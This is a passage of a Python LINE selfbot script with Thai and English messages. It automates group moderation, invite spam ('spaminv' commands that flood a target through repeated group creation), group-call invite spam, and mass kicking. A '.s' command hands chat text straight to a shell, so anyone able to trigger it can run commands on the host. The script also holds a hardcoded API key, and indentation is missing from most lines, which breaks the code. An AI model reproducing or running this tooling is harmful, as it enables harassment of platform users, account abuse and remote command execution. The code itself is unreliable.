line.sendMessage(to, 'ทำการยกเลิกค้างเชิญ %s' % group.name)
continue
line.rejectGroupInvitation(group.id)
rejected.append(group.id)
line.sendMessage(to, 'ทำการยกเลิกค้างเชิญ %s' % group.name)
elif name.lower() == 'all':
for gid in gids:
if gid in rejected:
continue
line.rejectGroupInvitation(gid)
rejected.append(gid)
time.sleep(0.8)
line.sendMessage(to, 'ยกเลิกคำเชิญเข้าร่วมกลุ่มทั้งหมดแล้ว ♪')
else:
line.sendMessage(to, 'ไม่สามารถยกเลิกคำเชิญเข้าร่วมกลุ่มชื่อ`%s`นี้ได้เนื่องจากไม่พบชื่อกลุ่มนี้ ♪' % name)
else:
for res in ress:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif cmd == 'memberlist':
if msg.toType == 1:
room = line.getRoom(to)
members = room.contacts
elif msg.toType == 2:
group = line.getGroup(to)
members = group.members
else:
return line.sendMessage(to, 'ไม่สามารถแสดงจำนวนสมาชิกในกลุ่มได้\nคำสั่งนี้ใช้ได้ในกลุ่มเท่านั้น')
if not members:
return line.sendMessage(to, 'ไม่สามารถแสดงจำนวนสมาชิกในกลุ่มได้\nไม่มีสมาชิกในกลุ่ม')
res = '╭───「 Member List 」'
parsed_len = len(members)//200+1
no = 0
for point in range(parsed_len):
for member in members[point*200:(point+1)*200]:
no += 1
res += '\n│ %i. %s' % (no, member.displayName)
if member == members[-1]:
res += '\n╰───「SelfBot ProtectV2.2」'
if res:
if res.startswith('\n'): res = res[1:]
line.sendMessage(to, res)
res = ''
elif cmd == 'pendinglist':
if msg.toType != 2: return line.sendMessage(to, 'ไม่สามารถแสดงจำนวนค้างเชิญในกลุ่มได้\nคำสั่งนี้ใช้ได้ในกลุ่มเท่านั้น')
group = line.getGroup(to)
members = group.invitee
if not members:
return line.sendMessage(to, 'ไม่สามารถแสดงจำนวนค้างเชิญในกลุ่มได้\nไม่พบค้างเชิญ')
res = '╭───「 Pending List 」'
parsed_len = len(members)//200+1
no = 0
for point in range(parsed_len):
for member in members[point*200:(point+1)*200]:
no += 1
res += '\n│ %i. %s' % (no, member.displayName)
if member == members[-1]:
res += '\n╰───「SelfBot ProtectV2.2」'
if res:
if res.startswith('\n'): res = res[1:]
line.sendMessage(to, res)
res = ''
elif cmd == 'openqr':
if msg.toType != 2: return line.sendMessage(to, 'ไม่สามารถเปิดลิ้งกลุ่มได้\nคำสั่งนี้ใช้ได้ในกลุ่มเท่านั้น')
group = line.getGroup(to)
group.preventedJoinByTicket = False
line.updateGroup(group)
line.sendMessage(to, 'เปิดลิ้งกลุ่มแล้ว')
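            # "im <query>": image search via a third-party proxy API; note the loose substring match,
            # so any message containing "im " will trigger this handler.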
elif "im " in msg.text.lower():
query = msg.text.replace("im ","")
r = requests.get("https://cryptic-ridge-9197.herokuapp.com/api/imagesearch/" + query + "?offset=1")
data=r.text
data=json.loads(r.text)
if data != []:
for food in data:
line.sendImageWithURL(msg.to, str(food["url"]))
elif msg.text.lower() == "/gift":
msg.contentType = 9
msg.contentMetadata={'PRDID': '','PRDTYPE': 'THEME','MSGTPL': '1'}
msg.text = None
                line.sendMessage(msg.to,text = None,contentMetadata = msg.contentMetadata,contentType = 9)  # themeid is not defined in this branch; reuse the metadata built above
elif "/gift " in msg.text.lower():
                red = re.compile(re.escape('/gift '),re.IGNORECASE)  # was '.gift ', which never strips this command's '/gift ' prefix
themeid = red.sub('',msg.text)
msg.contentType = 9
msg.contentMetadata={'PRDID': themeid,'PRDTYPE': 'THEME','MSGTPL': '1'}
msg.text = None
line.sendMessage(msg.to,text = None,contentMetadata={'PRDID': themeid,'PRDTYPE': 'THEME','MSGTPL': '1'},contentType = 9)
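            # weather:<city>: url_builder/data_fetch/data_organizer/data_output are assumed to be
            # helpers defined earlier; the numeric arguments are OpenWeatherMap-style city IDs.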
elif msg.text.lower() == "weather:chiangmai":
if msg.toType != 0:
data_output(msg.to,data_organizer(data_fetch(url_builder(1153670))),1)
else:
data_output(msg.from_,data_organizer(data_fetch(url_builder(1153670))),1)
elif msg.text.lower() == "weather:ubonratchathani":
if msg.toType != 0:
data_output(msg.to,data_organizer(data_fetch(url_builder(1605245))),2)
else:
data_output(msg.from_,data_organizer(data_fetch(url_builder(1605245))),2)
elif msg.text.lower() == "weather:bangkok":
if msg.toType != 0:
data_output(msg.to,data_organizer(data_fetch(url_builder(1609350))),3)
else:
data_output(msg.from_,data_organizer(data_fetch(url_builder(1609350))),3)
elif msg.text.lower() == "weather:phetchabun":
if msg.toType != 0:
data_output(msg.to,data_organizer(data_fetch(url_builder(1607737))),4)
else:
data_output(msg.from_,data_organizer(data_fetch(url_builder(1607737))),4)
elif msg.text.lower() == "weather:khon kaen":
if msg.toType != 0:
data_output(msg.to,data_organizer(data_fetch(url_builder(1609776))),5)
else:
data_output(msg.from_,data_organizer(data_fetch(url_builder(1609776))),5)
elif msg.text.lower() == "weather:ayutthaya":
if msg.toType != 0:
data_output(msg.to,data_organizer(data_fetch(url_builder(1607532))),6)
else:
data_output(msg.from_,data_organizer(data_fetch(url_builder(1607532))),6)
elif msg.text.lower() in ["weather"]:
if msg.toType != 0:
line.sendMessage(msg.to,"สภาพอากาศในแต่ละจังหวัด\n- chiangmai\n- ubonratchathani\n- bangkok\n- phetchabun\n-khon kaen\n-ayutthaya\nพิมพ์ \"weather:[ชื่อจังหวัด]\" เพื่อดูข้อมูลสภาพอากาศ")
else:
line.sendMessage(msg.to,"สภาพอากาศในแต่ละจังหวัด\n- chiangmai\n- ubonratchathani\n- bangkok\n- phetchabun\n-khon kaen\n-ayutthaya\nพิมพ์ \"weather:[ชื่อจังหวัด]\" เพื่อดูข้อมูลสภาพอากาศ")
#-----------------------------------------------------------
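            # .recall <count>: spams group-call invites <count> times, either to one mentioned member
            # or to every member of the group; g1 is assumed to be another LINE client instance.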
elif msg.text.lower().startswith(".recall"):
if msg.toType == 2:
reps = int(msg.text.split(" ")[1])
asup = [g1.adityasplittext(msg.text,'s').replace('{} '.format(reps),'')]*reps
                    if 'MENTION' in msg.contentMetadata.keys():
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
nama = [key1]
g1.sendMessage(to,"กำลังดำเนินการ...")
                        babu = [g1.call.inviteIntoGroupCall(to,nama,mediaType=2) for babu in asup]
                        g1.sendMessage(to,"เชิญคอลสำเร็จแล้ว!")
else:
g1.sendMessage(to,"กำลังดำเนินการ...")
                        group = g1.getGroup(to)
                        nama = [contact.mid for contact in group.members]
                        babu = [g1.call.inviteIntoGroupCall(to,nama,mediaType=2) for babu in asup]
                        g1.sendMessage(to,"เชิญคอลสำเร็จแล้ว!")
else:
g1.sendMessage(to,"คำสั่งนี้สามารถใช้ได้เฉพาะกลุ่ม")
elif cmd.startswith("spaminv "):
aa = cmd.replace("spaminv ","")
bb = aa.split("-")
count = int(bb[0])
name = str(bb[1])
target = bb[2]
grup = kicker.groups
try:
kicker.findAndAddContactsByMid(target)
except:
pass
for anu in range(count):
kicker.createGroup(name, [target])
for i in grup:
group = kicker.getGroup(i)
if group.name == name:
kicker.inviteIntoGroup(group.id, [target])
print("Inviting to group %s"%anu)
print("Sukses mank")
line.sendMessage(msg.to, "Success invite %s\nGroup : %s\nCount : %s"%(kicker.getContact(target).displayName, name, count))
elif cmd.startswith("spaminv2 "):
aa = cmd.replace("spaminv2 ","")
bb = aa.split("-")
count = int(bb[0])
name = str(bb[1])
target = bb[2]
grup = kicker2.groups
try:
kicker2.findAndAddContactsByMid(target)
except:
pass
for anu in range(count):
kicker2.createGroup(name, [target])
for i in grup:
group = kicker2.getGroup(i)
if group.name == name:
kicker2.inviteIntoGroup(group.id, [target])
print("Inviting to group %s"%anu)
print("Sukses mank")
line.sendMessage(msg.to, "Success invite %s\nGroup : %s\nCount : %s"%(kicker2.getContact(target).displayName, name, count))
elif cmd.startswith("spaminv3 "):
aa = cmd.replace("spaminv3 ","")
bb = aa.split("-")
count = int(bb[0])
name = str(bb[1])
target = bb[2]
grup = kicker3.groups
try:
kicker3.findAndAddContactsByMid(target)
except:
pass
for anu in range(count):
kicker3.createGroup(name, [target])
for i in grup:
group = kicker3.getGroup(i)
if group.name == name:
kicker3.inviteIntoGroup(group.id, [target])
print("Inviting to group %s"%anu)
print("Sukses mank")
line.sendMessage(msg.to, "Success invite %s\nGroup : %s\nCount : %s"%(kicker3.getContact(target).displayName, name, count))
elif cmd.startswith("spaminv4 "):
aa = cmd.replace("spaminv4 ","")
bb = aa.split("-")
count = int(bb[0])
name = str(bb[1])
target = bb[2]
grup = kicker4.groups
try:
kicker4.findAndAddContactsByMid(target)
except:
pass
for anu in range(count):
kicker4.createGroup(name, [target])
for i in grup:
group = kicker4.getGroup(i)
if group.name == name:
kicker4.inviteIntoGroup(group.id, [target])
print("Inviting to group %s"%anu)
print("Sukses mank")
line.sendMessage(msg.to, "Success invite %s\nGroup : %s\nCount : %s"%(kicker4.getContact(target).displayName, name, count))
elif cmd.startswith("spaminv5 "):
aa = cmd.replace("spaminv5 ","")
bb = aa.split("-")
count = int(bb[0])
name = str(bb[1])
target = bb[2]
grup = kicker5.groups
try:
kicker5.findAndAddContactsByMid(target)
except:
pass
for anu in range(count):
kicker5.createGroup(name, [target])
for i in grup:
group = kicker5.getGroup(i)
if group.name == name:
kicker5.inviteIntoGroup(group.id, [target])
print("Inviting to group %s"%anu)
print("Sukses mank")
line.sendMessage(msg.to, "Success invite %s\nGroup : %s\nCount : %s"%(kicker5.getContact(target).displayName, name, count))
elif cmd.startswith("spaminv6 "):
aa = cmd.replace("spaminv6 ","")
bb = aa.split("-")
count = int(bb[0])
name = str(bb[1])
target = bb[2]
grup = kicker6.groups
try:
kicker6.findAndAddContactsByMid(target)
except:
pass
for anu in range(count):
kicker6.createGroup(name, [target])
for i in grup:
group = kicker6.getGroup(i)
if group.name == name:
kicker6.inviteIntoGroup(group.id, [target])
print("Inviting to group %s"%anu)
print("Sukses mank")
line.sendMessage(msg.to, "Success invite %s\nGroup : %s\nCount : %s"%(kicker6.getContact(target).displayName, name, count))
elif cmd.startswith("spaminv7 "):
aa = cmd.replace("spaminv7 ","")
bb = aa.split("-")
count = int(bb[0])
name = str(bb[1])
target = bb[2]
grup = kicker7.groups
try:
kicker7.findAndAddContactsByMid(target)
except:
pass
for anu in range(count):
                    kicker7.createGroup(name, [target])
                    for i in grup:
                        group = kicker7.getGroup(i)
                        if group.name == name:
                            kicker7.inviteIntoGroup(group.id, [target])
print("Inviting to group %s"%anu)
print("Sukses mank")
line.sendMessage(msg.to, "Success invite %s\nGroup : %s\nCount : %s"%(kicker7.getContact(target).displayName, name, count))
elif cmd.startswith("spaminv8 "):
aa = cmd.replace("spaminv8 ","")
bb = aa.split("-")
count = int(bb[0])
name = str(bb[1])
target = bb[2]
grup = kicker9.groups
try:
kicker9.findAndAddContactsByMid(target)
except:
pass
for anu in range(count):
kicker9.createGroup(name, [target])
for i in grup:
group = kicker9.getGroup(i)
if group.name == name:
kicker9.inviteIntoGroup(group.id, [target])
print("Inviting to group %s"%anu)
print("Sukses mank")
line.sendMessage(msg.to, "Success invite %s\nGroup : %s\nCount : %s"%(kicker9.getContact(target).displayName, name, count))
elif cmd.startswith("spaminv9 "):
aa = cmd.replace("spaminv9 ","")
bb = aa.split("-")
count = int(bb[0])
name = str(bb[1])
target = bb[2]
grup = kicker10.groups
try:
kicker10.findAndAddContactsByMid(target)
except:
pass
for anu in range(count):
kicker10.createGroup(name, [target])
for i in grup:
group = kicker10.getGroup(i)
if group.name == name:
kicker10.inviteIntoGroup(group.id, [target])
print("Inviting to group %s"%anu)
print("Sukses mank")
line.sendMessage(msg.to, "Success invite %s\nGroup : %s\nCount : %s"%(kicker10.getContact(target).displayName, name, count))
elif cmd.startswith("spaminv10 "):
aa = cmd.replace("spaminv10 ","")
bb = aa.split("-")
count = int(bb[0])
name = str(bb[1])
target = bb[2]
grup = g1.groups
try:
g1.findAndAddContactsByMid(target)
except:
pass
for anu in range(count):
g1.createGroup(name, [target])
for i in grup:
group = g1.getGroup(i)
if group.name == name:
g1.inviteIntoGroup(group.id, [target])
print("Inviting to group %s"%anu)
print("Sukses mank")
line.sendMessage(msg.to, "Success invite %s\nGroup : %s\nCount : %s"%(g1.getContact(target).displayName, name, count))
elif cmd.startswith("spaminv11 "):
aa = cmd.replace("spaminv11 ","")
bb = aa.split("-")
count = int(bb[0])
name = str(bb[1])
target = bb[2]
grup = kicker7.groups
try:
kicker7.findAndAddContactsByMid(target)
except:
pass
for anu in range(count):
kicker7.createGroup(name, [target])
for i in grup:
group = kicker7.getGroup(i)
if group.name == name:
kicker7.inviteIntoGroup(group.id, [target])
print("Inviting to group %s"%anu)
print("Sukses mank")
line.sendMessage(msg.to, "Success invite %s\nGroup : %s\nCount : %s"%(kicker7.getContact(target).displayName, name, count))
elif cmd.startswith("lifftest"):
sep = text.split(" ")
search = text.replace(sep[0] + " ","")
r = requests.get("https://www.googleapis.com/youtube/v3/search?part=snippet&maxResults=10&q={}&type=video&key=AIzaSyAF-_5PLCt8DwhYc7LBskesUnsm1gFHSP8".format(str(search)))
data = r.text
a = json.loads(data)
if a["items"] != []:
ret_ = []
yt = []
for music in a["items"]:
ret_.append({"thumbnailImageUrl": 'https://i.ytimg.com/vi/{}/maxresdefault.jpg'.format(music['id']['videoId']),"imageSize": "contain","imageAspectRatio": "square","title": '{}'.format(str(music['snippet']['title'][:40])),"text": '{}'.format(str(music['snippet']['channelTitle'][:15])),"actions": [{"type": "uri","label": "Go Page","uri": 'https://www.youtube.com/watch?v=' +music['id']['videoId']}]})
yt.append('https://www.youtube.com/watch?v=' +music['id']['videoId'])
k = len(ret_)//10
                    for aa in range(k+1):
                        chunk = ret_[aa*10 : (aa+1)*10]
                        if not chunk:  # avoid sending an empty carousel when results divide evenly by 10
                            continue
                        data = {"type": "template","altText": "Youtube","template": {"type": "carousel","columns": chunk}}
sendflex(to, data)
elif ".s " in msg.text.lower():
spl = re.split(".s ",msg.text,flags=re.IGNORECASE)
if spl[0] == "":
try:
line.sendMessage(to,subprocess.getoutput(spl[1]))
except:
pass
        elif cmd == 'closeqr':
            if msg.toType != 2: return line.sendMessage(to, 'Cannot close the group link\nThis command can only be used in a group')
            group = line.getGroup(to)
            group.preventedJoinByTicket = True
            line.updateGroup(group)
            line.sendMessage(to, 'Group link closed')
        elif cmd.startswith('changegroupname '):
            if msg.toType != 2: return line.sendMessage(to, 'Cannot change the group name\nThis command can only be used in a group')
            group = line.getGroup(to)
            gname = removeCmd(text, setKey)
            if len(gname) > 50:
                return line.sendMessage(to, 'Cannot change the group name\nGroup names must not exceed 50 characters')
            group.name = gname
            line.updateGroup(group)
            line.sendMessage(to, 'Group name changed to `%s`' % gname)
        elif cmd == 'changegrouppict':
            if msg.toType != 2: return line.sendMessage(to, 'Cannot change the group picture\nThis command can only be used in a group')
            if to not in settings['changeGroupPicture']:
                settings['changeGroupPicture'].append(to)
                line.sendMessage(to, 'Please send a picture, or type `{key}Abort` to cancel\nNote: the download will fail if the upload takes too long'.format(key=setKey.title()))
            else:
                line.sendMessage(to, 'This command is already active, please send a picture or type `{key}Abort` to cancel\nNote: the download will fail if the upload takes too long'.format(key=setKey.title()))
        elif cmd == 'kickall':
            if msg.toType != 2: return line.sendMessage(to, 'Cannot kick all members\nThis command can only be used in a group')
            group = line.getGroup(to)
            if not group.members:
                return line.sendMessage(to, 'Cannot kick all members\nThere is no one to kick')
            for member in group.members:
                if member.mid == myMid:
                    continue
                try:
                    line.kickoutFromGroup(to, [member.mid])
                except TalkException as talk_error:
                    return line.sendMessage(to, 'Cannot kick all members because `%s`' % talk_error.reason)
                time.sleep(0.8)
            line.sendMessage(to, 'Kicked all members, total %i' % len(group.members))
        elif cmd == 'cancelall':
            if msg.toType != 2: return line.sendMessage(to, 'Cannot cancel pending invitations\nThis command can only be used in a group')
            group = line.getGroup(to)
            if not group.invitee:
                return line.sendMessage(to, 'Cannot cancel pending invitations\nThere are no pending invitees')
            for member in group.invitee:
                if member.mid == myMid:
                    continue
                try:
                    line.cancelGroupInvitation(to, [member.mid])
                except TalkException as talk_error:
                    return line.sendMessage(to, 'Cannot cancel pending invitations because `%s`' % talk_error.reason)
                time.sleep(0.8)
            line.sendMessage(to, 'All pending invitations canceled\nTotal: %i' % len(group.invitee))
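        # lurk: per-chat read-receipt tracking. lurking[to] keeps 'status', the 'time' it was armed,
        # the 'members' who have read since then, and an optional auto-'reply' message sent to readers.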
elif cmd.startswith('lurk'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
if msg.toType in [1, 2] and to not in lurking:
lurking[to] = {
'status': False,
'time': None,
'members': [],
'reply': {
'status': False,
'message': settings['defaultReplyReader']
}
}
res = '╭───「 Lurking 」'
if msg.toType in [1, 2]: res += '\n├ Status : ' + bool_dict[lurking[to]['status']][1]
if msg.toType in [1, 2]: res += '\n├ Reply Reader : ' + bool_dict[lurking[to]['reply']['status']][1]
if msg.toType in [1, 2]: res += '\n├ Reply Reader Message : ' + lurking[to]['reply']['message']
res += '\n├ Usage : '
res += '\n│ • {key}Lurk'
res += '\n│ • {key}Lurk <on/off>'
res += '\n│ • {key}Lurk Result'
res += '\n│ • {key}Lurk Reset'
res += '\n│ • {key}Lurk ReplyReader <on/off>'
res += '\n│ • {key}Lurk ReplyReader <message>'
res += '\n╰───「SelfBot ProtectV2.2」'
if cmd == 'lurk':
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
            elif msg.toType not in [1, 2]:
                return line.sendMessage(to, 'This command can only be used in a chat room or group')
            elif texttl == 'on':
                if lurking[to]['status']:
                    line.sendMessage(to, 'Reader detection is already enabled')
else:
lurking[to].update({
'status': True,
'time': datetime.now(tz=pytz.timezone('Asia/Jakarta')).strftime('%Y-%m-%d %H:%M:%S'),
'members': []
})
                    line.sendMessage(to, 'Reader detection enabled')
            elif texttl == 'off':
                if not lurking[to]['status']:
                    line.sendMessage(to, 'Reader detection is already disabled')
else:
lurking[to].update({
'status': False,
'time': None,
'members': []
})
                    line.sendMessage(to, 'Reader detection disabled')
            elif texttl == 'result':
                if not lurking[to]['status']:
                    line.sendMessage(to, 'Cannot show the reader list\nReader detection is not enabled')
                else:
                    if not lurking[to]['members']:
                        line.sendMessage(to, 'No readers have been detected yet')
else:
members = lurking[to]['members']
res = '╭───「 Lurking 」'
if msg.toType == 2: res += '\n├ Group Name : ' + line.getGroup(to).name
parsed_len = len(members)//200+1
no = 0
for point in range(parsed_len):
for member in members[point*200:(point+1)*200]:
no += 1
try:
name = line.getContact(member).displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
if member == members[-1]:
res += '\n│'
res += '\n├ Time Set : ' + lurking[to]['time']
res += '\n╰───「SelfBot ProtectV2.2」'
if res:
if res.startswith('\n'): res = res[1:]
line.sendMessage(to, res)
res = ''
            elif texttl == 'reset':
                if not lurking[to]['status']:
                    line.sendMessage(to, 'Cannot reset the reader list\nReader detection is not enabled')
                else:
                    lurking[to].update({
                        'status': True,
                        'time': datetime.now(tz=pytz.timezone('Asia/Jakarta')).strftime('%Y-%m-%d %H:%M:%S'),
                        'members': []
                    })
                    line.sendMessage(to, 'Reader list reset')
            elif texttl.startswith('replyreader '):
                texts = textt[12:]
                if texts == 'on':
                    if lurking[to]['reply']['status']:
                        line.sendMessage(to, 'The reply-reader message is already enabled')
                    else:
                        lurking[to]['reply']['status'] = True
                        line.sendMessage(to, 'Reply-reader message enabled')
                elif texts == 'off':
                    if not lurking[to]['reply']['status']:
                        line.sendMessage(to, 'The reply-reader message is already disabled')
                    else:
                        lurking[to]['reply']['status'] = False
                        line.sendMessage(to, 'Reply-reader message disabled')
                else:
                    lurking[to]['reply']['message'] = texts
                    line.sendMessage(to, 'Reply-reader message changed to `%s`' % texts)
else:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif cmd.startswith('greet'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
res = '╭───「 Greet Message 」'
res += '\n├ Greetings Join Status : ' + bool_dict[settings['greet']['join']['status']][1]
res += '\n├ Greetings Join Message : ' + settings['greet']['join']['message']
            res += '\n├ Greetings Leave Status : ' + bool_dict[settings['greet']['leave']['status']][1]
            res += '\n├ Greetings Leave Message : ' + settings['greet']['leave']['message']
res += '\n├ Usage : '
res += '\n│ • {key}Greet'
res += '\n│ • {key}Greet Join <on/off>'
res += '\n│ • {key}Greet Join <message>'
res += '\n│ • {key}Greet Leave <on/off>'
res += '\n│ • {key}Greet Leave <message>'
res += '\n╰───「SelfBot ProtectV2.2」'
if cmd == 'greet':
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif texttl.startswith('join '):
texts = textt[5:]
textsl = texts.lower()
                if textsl == 'on':
                    if settings['greet']['join']['status']:
                        line.sendMessage(to, 'The join greeting is already enabled')
                    else:
                        settings['greet']['join']['status'] = True
                        line.sendMessage(to, 'Join greeting enabled')
                elif textsl == 'off':
                    if not settings['greet']['join']['status']:
                        line.sendMessage(to, 'The join greeting is already disabled')
                    else:
                        settings['greet']['join']['status'] = False
                        line.sendMessage(to, 'Join greeting disabled')
                else:
                    settings['greet']['join']['message'] = texts
                    line.sendMessage(to, 'Join greeting message changed to `%s`' % texts)
elif texttl.startswith('leave '):
texts = textt[6:]
textsl = texts.lower()
                if textsl == 'on':
                    if settings['greet']['leave']['status']:
                        line.sendMessage(to, 'The leave greeting is already enabled')
                    else:
                        settings['greet']['leave']['status'] = True
                        line.sendMessage(to, 'Leave greeting enabled')
                elif textsl == 'off':
                    if not settings['greet']['leave']['status']:
                        line.sendMessage(to, 'The leave greeting is already disabled')
                    else:
                        settings['greet']['leave']['status'] = False
                        line.sendMessage(to, 'Leave greeting disabled')
                else:
                    settings['greet']['leave']['message'] = texts
                    line.sendMessage(to, 'Leave greeting message changed to `%s`' % texts)
else:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
        elif cmd.startswith('kick '):
            if msg.toType != 2: return line.sendMessage(to, 'This command can only be used in a group')
            if 'MENTION' in msg.contentMetadata.keys():
                mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
                for mention in mentions['MENTIONEES']:
                    mid = mention['M']
                    if mid == myMid:
                        continue
                    try:
                        kicker5.kickoutFromGroup(to, [mid])
                    except TalkException as talk_error:
                        return kicker5.sendMessage(to, 'Cannot kick the member\nbecause `%s`' % talk_error.reason)
                    time.sleep(0.8)
                kicker5.sendMessage(to, 'Members kicked\nTotal: %i' % len(mentions['MENTIONEES']))
            else:
                kicker5.sendMessage(to, 'Cannot kick\nPlease mention the member(s) to kick')
        elif cmd.startswith('vkick '):
            if msg.toType != 2: return line.sendMessage(to, 'This command can only be used in a group')
            if 'MENTION' in msg.contentMetadata.keys():
                mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
                for mention in mentions['MENTIONEES']:
                    mid = mention['M']
                    if mid == myMid:
                        continue
                    try:
                        line.kickoutFromGroup(to, [mid])
                        line.findAndAddContactsByMid(mid)
                        line.inviteIntoGroup(to, [mid])
                        line.cancelGroupInvitation(to, [mid])
                    except TalkException as talk_error:
                        return line.sendMessage(to, 'Cannot kick the member\nbecause `%s`' % talk_error.reason)
                    time.sleep(0.8)
                line.sendMessage(to, 'Members kicked\nTotal: %i' % len(mentions['MENTIONEES']))
            else:
                line.sendMessage(to, 'Cannot kick\nPlease mention the member(s) to kick')
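
# executeOp() below handles polled LINE operations (friend adds, invites, joins, leaves, kicks) and applies
# the protection settings. Its recovery paths repeat the same "try one kicker account, fall back to the
# next" cascade for every account. A minimal sketch of a helper that could express that pattern is shown
# here; it is illustrative only, it is NOT called anywhere in this script, and it assumes each attempt
# should simply be abandoned on any exception, exactly like the existing bare try/except chains.
def _first_success(attempts):
    """Run each zero-argument callable in order, stopping at the first one that does not raise.

    Returns True if one attempt succeeded, False if every attempt raised.
    """
    for attempt in attempts:
        try:
            attempt()
            return True
        except Exception:
            continue
    return False

# Hypothetical usage replacing one nested cascade (gid/attacker/victim are placeholder names):
#   _first_success([
#       lambda: (kicker.kickoutFromGroup(gid, [attacker]), kicker.inviteIntoGroup(gid, [victim])),
#       lambda: (kicker2.kickoutFromGroup(gid, [attacker]), kicker2.inviteIntoGroup(gid, [victim])),
#   ])
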
def executeOp(op):
try:
print ('[* %i ] %s' % (op.type, OpType._VALUES_TO_NAMES[op.type].replace('_', ' ')))
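        # Assumed OpType meanings, based on how they are handled below: 5 = added as friend,
        # 13 = invited to a group, 17 = member joined, 15 = member left, 11 = group/QR link updated,
        # 19 = member kicked, 32 = group invitation cancelled.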
if op.type == 5:
if settings['autoAdd']['status']:
line.findAndAddContactsByMid(op.param1)
if settings['autoAdd']['reply']:
if '@!' not in settings['autoAdd']['message']:
line.sendMessage(op.param1, settings['autoAdd']['message'])
else:
line.sendMentionV2(op.param1, settings['autoAdd']['message'], [op.param1])
if op.type == 13:
if settings['autoJoin']['status'] and myMid in op.param3:
line.acceptGroupInvitation(op.param1)
if settings['autoJoin']['reply']:
if '@!' not in settings['autoJoin']['message']:
line.sendMessage(op.param1, settings['autoJoin']['message'])
else:
line.sendMentionV2(op.param1, settings['autoJoin']['message'], [op.param2])
if op.type == 15:
if settings['greet']['leave']['status']:
if '@!' not in settings['greet']['leave']['message']:
line.sendMessage(op.param1, settings['greet']['leave']['message'].format(name=line.getGroup(op.param1).name))
else:
line.sendMentionV2(op.param1, settings['greet']['leave']['message'].format(name=line.getGroup(op.param1).name), [op.param2])
if op.type == 17:
if settings['greet']['join']['status']:
if '@!' not in settings['greet']['join']['message']:
line.sendMessage(op.param1, settings['greet']['join']['message'].format(name=line.getGroup(op.param1).name))
else:
line.sendMentionV2(op.param1, settings['greet']['join']['message'].format(name=line.getGroup(op.param1).name), [op.param2])
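        # Protection handlers: the blocks below watch for QR-link changes, unwanted invites, cancelled
        # invites, joins by blacklisted users and kicks, and respond with a randomly chosen helper account
        # from ABC, falling back through the kicker accounts when a call fails.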
if op.type == 11:
if op.param1 in protectqr:
try:
if line.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
random.choice(ABC).reissueGroupTicket(op.param1)
X = line.getGroup(op.param1)
X.preventedJoinByTicket = True
random.choice(ABC).updateGroup(X)
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
except:
pass
if op.type == 13:
if op.param1 in protectinvite:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
try:
invitor = op.param2
gotinvite = []
if "\x1e" in op.param3:
gotinvite = op.param3.split("\x1e")
else:
gotinvite.append(op.param3)
                        for u in gotinvite:
                            wait["blacklist"][op.param2] = True
                            kicker.cancelGroupInvitation(op.param1,[u])
                            kicker.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kicker2.cancelGroupInvitation(op.param1,[op.param3])
kicker2.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kicker3.cancelGroupInvitation(op.param1,[op.param3])
kicker3.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kicker4.cancelGroupInvitation(op.param1,[op.param3])
kicker4.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kicker5.cancelGroupInvitation(op.param1,[op.param3])
kicker5.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kicker6.cancelGroupInvitation(op.param1,[op.param3])
kicker6.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kicker7.cancelGroupInvitation(op.param1,[op.param3])
kicker7.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kicker8.cancelGroupInvitation(op.param1,[op.param3])
kicker8.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kicker9.cancelGroupInvitation(op.param1,[op.param3])
kicker9.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kicker10.cancelGroupInvitation(op.param1,[op.param3])
kicker10.kickoutFromGroup(op.param1,[op.param2])
except:
pass
if op.type == 13:
if op.param3 in wait["blacklist"]:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
random.choice(ABC).cancelGroupInvitation(op.param1,[op.param3])
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
G = line.getGroup(op.param1)
G.preventedJoinByTicket = True
random.choice(ABC).updateGroup(G)
if op.type == 32:
if op.param1 in protectcanceljs:
if op.param3 in Bots:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
wait["blacklist"][op.param2] = True
                        try:
                            if op.param3 not in wait["blacklist"]:
                                random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
                                line.inviteIntoGroup(op.param1,[g1MID])
                                G = line.getGroup(op.param1)
                                G.preventedJoinByTicket = True
                                random.choice(ABC).updateGroup(G)
                        except:
                            pass
return
        if op.type == 32:
            if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
                if op.param1 in protectcancel:
                    random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
                    kicker.findAndAddContactsByMid(op.param3)
                    kicker.inviteIntoGroup(op.param1,[op.param3])
                    wait["blacklist"][op.param2] = True
if op.type == 17:
if op.param2 in wait["blacklist"]:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
G = line.getGroup(op.param1)
G.preventedJoinByTicket = True
random.choice(ABC).updateGroup(G)
if op.type == 17:
if op.param1 in protecARoin:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
wait["blacklist"][op.param2] = True
try:
if op.param3 not in wait["blacklist"]:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
except:
pass
return
#================================================================================
